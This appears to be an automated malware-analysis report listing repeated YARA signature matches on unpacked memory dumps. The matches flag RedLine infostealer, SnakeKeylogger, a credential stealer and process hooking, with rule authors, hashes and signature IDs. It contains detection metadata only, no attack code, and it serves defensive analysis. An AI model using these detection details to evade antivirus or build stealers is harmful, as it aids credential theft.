Source: 3.2.jphwmyiA.pif.250b99de.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.jphwmyiA.pif.250b99de.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.yxU3AgeVTi.exe.215f2418.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 4.2.Aiymwhpj.PIF.213367a8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.jphwmyiA.pif.29cc99de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.jphwmyiA.pif.29cc99de.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.jphwmyiA.pif.29cc99de.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.jphwmyiA.pif.250b99de.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.jphwmyiA.pif.250b99de.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.jphwmyiA.pif.250b99de.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.Aiymwhpj.PIF.213733d8.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.3.jphwmyiA.pif.27e8ce70.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.3.jphwmyiA.pif.27e8ce70.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.3.jphwmyiA.pif.27e8ce70.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.jphwmyiA.pif.25350ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.jphwmyiA.pif.25350ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.jphwmyiA.pif.25350ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.jphwmyiA.pif.29cca8c6.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.jphwmyiA.pif.29cca8c6.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.jphwmyiA.pif.29cca8c6.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.jphwmyiA.pif.29f60000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.jphwmyiA.pif.29f60000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.jphwmyiA.pif.29f60000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.jphwmyiA.pif.250ba8c6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.jphwmyiA.pif.250ba8c6.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.jphwmyiA.pif.250ba8c6.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.1.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.jphwmyiA.pif.29f60ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.jphwmyiA.pif.29f60ee8.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.jphwmyiA.pif.29f60ee8.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.jphwmyiA.pif.1b30a8c6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.1b30a8c6.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.jphwmyiA.pif.1b30a8c6.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.jphwmyiA.pif.1b3099de.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.1b3099de.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.jphwmyiA.pif.1b3099de.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.jphwmyiA.pif.1d9f0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.1d9f0000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.jphwmyiA.pif.1d9f0000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.1.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.1.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.jphwmyiA.pif.1b3099de.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.1b3099de.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.jphwmyiA.pif.1b3099de.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.jphwmyiA.pif.27870000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.1.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.jphwmyiA.pif.29f60000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.jphwmyiA.pif.2a120000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.jphwmyiA.pif.2a120000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.jphwmyiA.pif.2a120000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.yxU3AgeVTi.exe.21659f78.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.jphwmyiA.pif.27870000.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.3.jphwmyiA.pif.2352c260.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.jphwmyiA.pif.2a120000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.3.jphwmyiA.pif.2352c260.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.jphwmyiA.pif.2a120000.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.1.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
